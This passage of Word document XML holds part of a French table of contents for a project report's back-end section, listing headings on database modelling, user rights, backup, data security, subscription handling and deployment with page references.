            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C1173D9" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817764" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6. RÉALISATIONS BACK-END</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817764 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54961E2D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817765" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1 Mise en place de la base de données relationnelle</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817765 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E109617" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817766" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.1 Modèle Conceptuel de Données (MCD)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817766 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D5ABFDA" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817767" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.2 Modèle Logique de Données (MLD)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817767 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D7F03AF" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817768" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.3 Modèle Physique de Données (MPD)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817768 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CBD2339" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817769" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.4 Script de création de la base de données</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817769 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EFD0298" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817770" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.5 Jeu d'essai et données de test</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817770 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B596698" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817771" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.6 Gestion des utilisateurs et des droits</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817771 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FC1CC48" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817772" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.7 Sauvegarde et restauration</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817772 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38C6B1C2" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817773" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.8 Sécurité et intégrité des données</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817773 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="399E43E2" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817774" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2 Développement des composants d'accès aux données</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817774 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="079EF7DE" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817775" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Historique des devis (espace utilisateur)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817775 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7897AD0D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817776" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Détail d'une souscription (espace utilisateur)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817776 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DD6CEC5" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817777" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Liste des souscriptions (espace admin)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817777 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64C74FEE" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817778" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.3 Développement des composants métier côté serveur</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817778 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D523ABF" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817779" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Calcul du prix estimé</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817779 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66A490B2" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817780" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Gestion du cycle de vie d'une souscription</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817780 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="524FD84D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817781" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.4 Documentation du déploiement</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817781 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
